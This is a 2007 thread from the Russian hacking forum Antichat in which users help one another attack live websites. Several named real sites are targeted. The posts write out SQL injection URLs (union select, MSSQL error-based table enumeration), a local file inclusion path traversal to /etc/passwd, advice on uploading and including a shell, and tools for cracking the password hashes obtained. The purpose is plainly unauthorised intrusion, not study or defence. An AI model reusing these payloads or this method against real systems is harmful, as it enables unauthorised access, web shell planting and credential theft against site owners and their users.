 |
|
12.12.2007, 15:49
|
|
Новичок
Регистрация: 23.01.2007
Сообщений: 21
С нами:
10157371
Репутация:
1
|
|
на сайте есть форма, всё введённое в неё добавляется в базу данных мускул 5 версии.(без фильтрации)
есть скуль иньекция в (index.php?id=999+union+select+1,2,3,4/*) и я могу вывести на экран инфу, что я ввёл в форму (и то что другие ввели тоже, коненчо)
(столбец 3 выводится на экран)
Последний раз редактировалось Girsoft; 12.12.2007 в 15:52..
|
|
|
12.12.2007, 16:13
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
ничего ты не зальешь, у тебя file_priv() отключен
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
12.12.2007, 16:19
|
|
Новичок
Регистрация: 23.01.2007
Сообщений: 21
С нами:
10157371
Репутация:
1
|
|
тоесть шелл через скулиньекцию можно залить только если file_priv() включён? (если исключить нестандартные ситуации, например что инклудятся файлы имя которых берётся из БД)
И ещё один вопрос:
на сайте есть уязвимость (локальный инклуд)
index.php?menu=../../../../../etc/passwd%00
На страницу выводятся пароли.
От чего это пароли? Чем их расшифровать? Куда их вводить когда расшифровал?
ВСЕМ УЧАСНИКАМ ТЕМЫ ОГРОМНЫЙ РЕСПЕКТ ЗА ПОМОЩЬ ЛЮДЯМ!!!
|
|
|
|
12.12.2007, 16:27
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
очень странно, что ты нашел там пароли, пароли эти например от ssh или ftp
99% "расшифровать" их можно с помощью passwordpro или jtr...
но я опять же сомневаюсь, что хеши паролей там есть... про локальный инклюд читай здесь:http://forum.antichat.ru/showpost.php?p=495764&postcount=535
__________________
Карфаген должен быть разрушен...
|
|
|
|
12.12.2007, 17:51
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
С нами:
10126406
Репутация:
206
|
|
как фильтрацию обойти ?
http://fun2fon.ru/index.php?cntsearch='
http://fun2fon.ru/index.php?cntsearch=-1+union+select+1/* что вообще можно сделать?
|
|
|
|
12.12.2007, 20:47
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Сообщение от Girsoft
тоесть шелл через скулиньекцию можно залить только если file_priv() включён? (если исключить нестандартные ситуации, например что инклудятся файлы имя которых берётся из БД)
И ещё один вопрос:
на сайте есть уязвимость (локальный инклуд)
index.php?menu=../../../../../etc/passwd%00
На страницу выводятся пароли.
От чего это пароли? Чем их расшифровать? Куда их вводить когда расшифровал?
ВСЕМ УЧАСНИКАМ ТЕМЫ ОГРОМНЫЙ РЕСПЕКТ ЗА ПОМОЩЬ ЛЮДЯМ!!!
Да, толькое если есть файл прив. Иначе никак.
Как таковые, эти пароли не особо нужны. Но, можно методом тыка найти довольно нужные файлы конфигов. Так же, просизвести локал инклуд. Т.е. если на том сайте где ты нашёл этот инклуд, есть загрузка каких либо файлов, то загружаешь этот файл с кодом шелла внутри, и уже инклудишь этот файл. Считай шелл у тебя на руках. Рекомендуется к прочтению (и копипасту:d):
https://forum.antichat.ru/thread49775.html
Хотя может это просто читалка файлов, выгоды от неё конечно меньше, т.к. код не интерпретируется, но и с неё можно получить выгоду.
|
|
|
|
12.12.2007, 21:03
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
file_priv это не функция, не надо скобки ставить =)
|
|
|
|
12.12.2007, 23:46
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
С нами:
10054253
Репутация:
86
|
|
вот искал рефераты на тему алюминия...
Код:
http://studentport.su/referats/referat.php?id=23968
http://studentport.su/referats/referat.php?id=-1'
http://studentport.su/referats/referat.php?id=-1+order+by+11/*
http://studentport.su/referats/referat.php?id=-1+union+selct+1,2,3,4,5,6,7,8,9,10,11/*
помогите плииз  |
|
|
|
12.12.2007, 23:48
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
А в чем сложность? это mssql
Код:
http://studentport.su/referats/referat.php?id=1+or+1=@@version
Код:
http://studentport.su/referats/referat.php?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 12.12.2007 в 23:59..
|
|
|
|
13.12.2007, 01:13
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
У меня вопрос, почему при таком запросе ругается ?
Код:
http://studentport.su/referats/referat.php?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('page'))--
Код:
Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15) in c:\inetpub\wwwroot\referats\globals.php on line 86
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 34 (пользователей: 0 , гостей: 34)
|
|
|
|
Похожие темы
Линейный вид
